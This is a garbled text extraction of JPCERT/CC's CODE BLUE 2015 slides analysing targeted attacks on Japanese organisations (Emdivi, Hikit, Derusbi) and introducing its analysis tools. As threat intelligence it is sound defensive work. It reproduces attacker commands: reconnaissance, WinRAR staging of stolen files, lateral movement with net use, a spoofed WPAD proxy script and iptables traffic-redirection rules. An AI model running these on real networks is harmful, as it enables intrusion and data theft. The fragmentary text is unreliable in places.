Upload
code-blue
View
1.101
Download
0
Embed Size (px)
Citation preview
JPCERT CODE BLUE 2015
Copyright2015 JPCERT/CC All rights reserved.
0
1 A B
Copyright2015 JPCERT/CC All rights reserved.2 A B
Copyright2015 JPCERT/CC All rights reserved.
JPCERT
3 (Shusei Tomonaga)
(Yuu Nakamura)
Copyright2015 JPCERT/CC All rights reserved.JPCERT Japan Computer Emergency Response Team Coordination CenterCSIRT 4
Copyright2015 JPCERT/CC All rights reserved.
4
JPCERT/CC
5201549934
130
934AB
Copyright2015 JPCERT/CC All rights reserved.6
Copyright2015 JPCERT/CC All rights reserved.7 A B
Copyright2015 JPCERT/CC All rights reserved.
8
A
Copyright2015 JPCERT/CC All rights reserved.Flash Player (CVE-2015-5119CVE-2015-5122)MS14-068(Kerberos (3011780))- CVE-2014-63248
9
Copyright2015 JPCERT/CC All rights reserved.10
Copyright2015 JPCERT/CC All rights reserved.11Timeline of Attack Vector()Drive-ByDownload2014/052015/012015/052015/07CVE-2014-7247CVE-2015-5119CVE-2015-5122
zip lzh 2014/092014/112015/09
Copyright2015 JPCERT/CC All rights reserved.
11
12
Copyright2015 JPCERT/CC All rights reserved.13MS
Copyright2015 JPCERT/CC All rights reserved.dsquery14
Copyright2015 JPCERT/CC All rights reserved.Nirsoft Mail PassView
15
Copyright2015 JPCERT/CC All rights reserved.16
Copyright2015 JPCERT/CC All rights reserved.
16
1> net use
-------------------------------------------------------------------------------OK T:\\FILESV01\SECRET Microsoft Windows NetworkOK U:\\FILESV02\SECRET Microsoft Windows Network> wmic logicaldisk get caption,providername,drivetype,volumenameCaption DriveType ProviderName VolumeNameC: 3OSD: 3 T: 4 \\FILESV01\SECRET U: 4 \\FILESV01\SECRET NET USEwmic
17DriveType = 4
Copyright2015 JPCERT/CC All rights reserved. 2> netstat an
TCP 192.168.xx.xx:49217 192.168.yy.yy:445 ESTABLISHED
> nbtstat -a 192.168.yy.yy ---------------------------------------------FILESV01 netstat nbtstat 445
18
Copyright2015 JPCERT/CC All rights reserved.> dir c:\users\hoge\*.doc* /s /o-d
c:\users\hoge\AppData\Local\Temp
2014/07/29 10:19 28,672 20140820.doc1 28,672
c:\users\hoge\
2015/08/29 10:03 1,214 .doc> dir \\FILESV01\SECRET
\\FILESV\SECRET
2014/07/11 09:16 [DIR] 2014/09/04 11:49 [DIR] 2014/08/01 09:27 [DIR] 19dir/s : /o-d :
Copyright2015 JPCERT/CC All rights reserved.> winrar.exe a r ed v300m ta20140101 %TEMP%\a.rar \\FILESV01\SECRET\ -n*.ppt* -n*.doc* -n*.xls* -n*.jtd
Adding \\FILESV01\SECRET\\(2015.05.01).docx OKAdding \\FILESV01\SECRET\\.ppt OKAdding \\FILESV01\SECRET\\.xlsx OKAdding \\FILESV01\SECRET\\.jtd OKC&Crar 20RAR
Copyright2015 JPCERT/CC All rights reserved.21
Copyright2015 JPCERT/CC All rights reserved.22
Copyright2015 JPCERT/CC All rights reserved.
(MS14-068 + MS14-058) 23
DomainControllerPC-A
PC-B
1. (MS14-058) mimikatz
2. MS14-068 Domain Admin 3. DC mimikatz admin 4. PC-B 5. 6.
Copyright2015 JPCERT/CC All rights reserved.
23
SYSVOL 24
C2 Server3. admin PC-A
PC-B
6.
2. 1.
DomainController5. 4. PC-B
Copyright2015 JPCERT/CC All rights reserved.
25
PC-A
PC-B
4. 3.
1. Domain Admins 5. DomainController2. logon.exe
Copyright2015 JPCERT/CC All rights reserved.Builtin Administrator 26
PC-A
PC-B
3.
1. (UAC bypass) 5. 4.
net use \\PC-B\IPC$ [password] /u:Administrator2. pass the hash or net use
Copyright2015 JPCERT/CC All rights reserved.
27
PC-A
PC-B
2.
1.
Copyright2015 JPCERT/CC All rights reserved.WPAD
DHCPURLhttp://wpad/wpad.dat
28
WPAD (Web Proxy Auto-Discovery)
Copyright2015 JPCERT/CC All rights reserved.WPAD(step 1: NetBIOS Spoofing)29
PC-A
PC-B
2. Name query response (I am WPAD)1. Broadcast: Name query NB WPADwpad.exe
Copyright2015 JPCERT/CC All rights reserved.WPAD(step 2: fake WPAD server)30
PC-A
PC-B
4. responsewpad.exe
function FindProxyForURL(url, host) {
if (myIpAddress() != [PC-A addr]) {return PROXY wpad:8888;DIRECT;}return DIRECT;}wpad.dat ()3. request http://wpad/wpad.dat
Copyright2015 JPCERT/CC All rights reserved.WPAD(step 3: man in the middle proxy)31
PC-A
PC-B
5. Web iframe wpad.exe
6. drive by download attack
Attackers Web Site
Web site
Copyright2015 JPCERT/CC All rights reserved.ADMS14-068DCSYSVOLBuiltin AdministratorWPAD
32
Copyright2015 JPCERT/CC All rights reserved.
33
Copyright2015 JPCERT/CC All rights reserved.34Emdivi (t17)HTTP BOTEXEEXE usp10jpgDLL, dataEmdivi(t19, t20)t17 HTTP BOTEXEBeginXEXEGStatusHTTP BOTEXE,DLL
: [. . MWS, 2015]
Copyright2015 JPCERT/CC All rights reserved.35Pass-the-hashQuarks PwDumpqp.exe, qd.exe, QDump.exeMimikatzLitegp.exeWindows credentials Editorwce.exe, ww.exeMimikatzmz.exe, mimikatz.exe, mimikatz.rar(sekurlsa.dll)MS14-068 (CVE-2014-6324)ms14-068.exems14-068.tar.gzMS14-058 ()(CVE-2014-4113)4113.exeUAC bypassUAC bypass msdart.exe, puac.exeHtran, proxyHtranhtproxy.exenirsoft Mail PassViewCallMail.exe, outl.exe logonlogon.exeWinRARyrar.exe, rar,exe dir dirasd.exetimestamp timestomp.exe
Copyright2015 JPCERT/CC All rights reserved.Emdivi (t17)
36DOABORTDOWNBGGETFILELOADDLLSETCMDSUSPENDUPLOADVERSIONGOTO20155CLEARLOGS20158
HTTP BOT
Copyright2015 JPCERT/CC All rights reserved.Emdivi (t20)
(JPCERT)
SID
37Emdivi
Copyright2015 JPCERT/CC All rights reserved.
usp10jpg
11 EmdiviDLL
38
dwmapi.dll
***.DAT
DLLDLL
Copyright2015 JPCERT/CC All rights reserved.usp10jpg 39
Emdivi
usp10jpg
Copyright2015 JPCERT/CC All rights reserved.BeginX
BeginX Server UDPTCP
BeginX ClientBeginX Server Emdivi 40
Copyright2015 JPCERT/CC All rights reserved.BeginX41
Emdivi
BeginxServer
BeginxClient
Emdivi
BeginX
Emdivi
Copyright2015 JPCERT/CC All rights reserved.42
EmdiviHTTP BOTGStatus
Copyright2015 JPCERT/CC All rights reserved.GStatus Web ()43
Copyright2015 JPCERT/CC All rights reserved.
44emdivi_string_decryptor.py
Copyright2015 JPCERT/CC All rights reserved.45emdivi_string_decryptor.py
Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py
46Emdivi encoded strings
Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py47Difference depending on version stringVer 17Ver 19 or 20Ver 20EncryptXxTEA encryptXxTEA decryptAES decryptDecryptXxTEA decryptXxTEA encryptAES encryptKeyMD5( MD5(base64(ver)) + MD5(key_string))Scanf( "%x", Inc_Add( ver17_key ))Inc_Add( ver17_key)
Copyright2015 JPCERT/CC All rights reserved.
47
emdivi_string_decryptor.py
48
Copyright2015 JPCERT/CC All rights reserved.emdivi_string_decryptor.py
49
Copyright2015 JPCERT/CC All rights reserved.Demo
50
Copyright2015 JPCERT/CC All rights reserved.51 A B
Copyright2015 JPCERT/CC All rights reserved.Attack techniques52
Copyright2015 JPCERT/CC All rights reserved.Attack techniques53
Copyright2015 JPCERT/CC All rights reserved.
54
Web
1. Web
. 0. Web
. .
Copyright2015 JPCERT/CC All rights reserved.
54
55.htaccessTarget nameIP address
Copyright2015 JPCERT/CC All rights reserved.0day Exploit56
Copyright2015 JPCERT/CC All rights reserved.Attack techniques57
Copyright2015 JPCERT/CC All rights reserved.
58
1.
0.
. .
.
.
Copyright2015 JPCERT/CC All rights reserved.
58
59
0. iptables
1.
Copyright2015 JPCERT/CC All rights reserved.
59
iptables -t nat -A PREROUTING -i eth0 -s aa.bb.cc.dd -p tcp --dport 80 -j DNAT --to-destination ww.xx.yy.zz:5360iptables
Copyright2015 JPCERT/CC All rights reserved.
60
Attack techniques61
Copyright2015 JPCERT/CC All rights reserved.
62
.comDNS
DNSWebDNSWeb0.
1.DNS2.DNS
4.Web
Copyright2015 JPCERT/CC All rights reserved.
62
iptables -t nat -A PREROUTING -p udp --dport 53 -m string --from 40 --to 46 --hex-string "|03|AAA" --algo bm -j DNAT --to-destination aa.bb.cc.dd:54
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to ww.xx.yy.zz:5363iptablesDNS
AAA.example.com
Copyright2015 JPCERT/CC All rights reserved.
63
64
Copyright2015 JPCERT/CC All rights reserved.65
Copyright2015 JPCERT/CC All rights reserved.66
Copyright2015 JPCERT/CC All rights reserved. ()67commandinfo0x1840040x1840080x18400c0x1840100x1840140x1840180x18401c0x184020
commandinfo0x1840240x1840280x18402c0x184030Sleep0x1840340x184038Sleep Time0x18403c
HTTP
Copyright2015 JPCERT/CC All rights reserved.68WebC2
start: @MICR0S0FTend: C0RP0RATI0Nstart: lOve yOu 4 eveRend: Reve 4 uOy evOl
Copyright2015 JPCERT/CC All rights reserved. ()69command numberinfo01TickCount3456789-
Copyright2015 JPCERT/CC All rights reserved.70
ROP
ShellcodeMalwareCVE-2013-3918 with McRAT
Copyright2015 JPCERT/CC All rights reserved.71CVE-2013-3918 with McRAT
rundll32.exe
Shellcode
Copyright2015 JPCERT/CC All rights reserved. ()72HTTPcommandinfo downonly downexec -
Copyright2015 JPCERT/CC All rights reserved.Preshin Controller73
PHP
Copyright2015 JPCERT/CC All rights reserved.Preshin Controller74
Copyright2015 JPCERT/CC All rights reserved. ()75HTTPcommandinfo123457
commandinfo8-910111213
Copyright2015 JPCERT/CC All rights reserved. ()76Rootkitcommandinfo file information proxy connectHikit shell socks5(socks5) exit
Copyright2015 JPCERT/CC All rights reserved.Hikit77
Rootkit
Copyright2015 JPCERT/CC All rights reserved. ()78commandinfo cmd4 cmd5 cmd6Derusbi cmd7 cmd8 cmd9
Copyright2015 JPCERT/CC All rights reserved.
Derusbi79
Copyright2015 JPCERT/CC All rights reserved.80IdentityTypeCountry System IntegratorexeJapan Software VendorexeJapan Software VendorexeKorea AutomakerexeKorea Heavy IndustryjarKorea Software VendorexeKorea Electronics IndustryjarKorea Software VendorexeKorea
Copyright2015 JPCERT/CC All rights reserved.
81
Backdoor
C2
iptables
Copyright2015 JPCERT/CC All rights reserved.
81
Linux Backdoor82mod_rootme
Roronoa
Copyright2015 JPCERT/CC All rights reserved.Linux Backdoor83FunctionMyNetstatCreateShellMymkdirPortTunnelGetGetFileSourceMymkfilePortTunnel_RemoteCloseMyPsMyrmfilePortTunnel_ShowKillByPidMyrmdirCreatePortTunnelNewConnectToListDirPortForwardStartPutFilemy_rebootPortForward_ShowPutFileDestShowHidePortForward_CloseShellServerSwitchHide
Copyright2015 JPCERT/CC All rights reserved.
84apt17scan.py
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py85
Copyright2015 JPCERT/CC All rights reserved.
apt17scan.py86Scan with YARASearch configuration data addressParse configuration dataDump configuration
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py87apt17scan
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py88derusbiconfig Derusbi
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py89hikitconfig Hikit
Copyright2015 JPCERT/CC All rights reserved.apt17scan.py90agtidconfig Agtid
Copyright2015 JPCERT/CC All rights reserved.Demo
91
Copyright2015 JPCERT/CC All rights reserved.How to download92https://github.com/JPCERTCC
Copyright2015 JPCERT/CC All rights reserved.Thank [email protected]://www.jpcert.or.jp
[email protected]://www.jpcert.or.jp/form/
Copyright2015 JPCERT/CC All rights reserved.
93